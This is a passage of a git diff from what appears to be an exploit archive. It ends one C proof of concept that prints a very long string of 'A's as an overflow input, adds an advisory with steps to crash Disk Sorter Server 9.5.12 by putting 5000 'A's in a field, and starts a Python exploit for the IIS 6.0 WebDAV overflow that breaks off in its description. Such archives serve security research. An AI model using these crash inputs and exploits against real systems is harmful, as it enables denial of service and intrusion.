printf("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); +} \ No newline at end of file diff --git a/platforms/windows/dos/41737.txt b/platforms/windows/dos/41737.txt new file mode 100755 index 000000000..1d868fd2d --- /dev/null +++ b/platforms/windows/dos/41737.txt @@ -0,0 +1,51 @@ +[+] Title: Disk Sorter Server v9.5.12 - Local Stack-based buffer overflow +[+] Credits / Discovery: Nassim Asrir +[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ +[+] Author Company: Henceforth +[+] CVE: N/A + +Vendor: +=============== + +http://www.disksorter.com/ + + +Download: +=========== + +http://www.disksorter.com/setups/disksortersrv_setup_v9.5.12.exe + + +Vulnerability Type: +=================== + +local stack-based buffer overflow + + +POC: +=================== + +Launch the program click on : + +1 - Server + +2 - Connect + +3 - and in the Share Name field inject (5000 "A") then the program crashed see the picture. + +CVE Reference: +=============== + +N/A + + +Tested on: +=============== + +Windows 7 + +Win xp + + + + diff --git a/platforms/windows/remote/41738.py b/platforms/windows/remote/41738.py new file mode 100755 index 000000000..8df257d66 --- /dev/null +++ b/platforms/windows/remote/41738.py @@ -0,0 +1,45 @@ +''' +Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: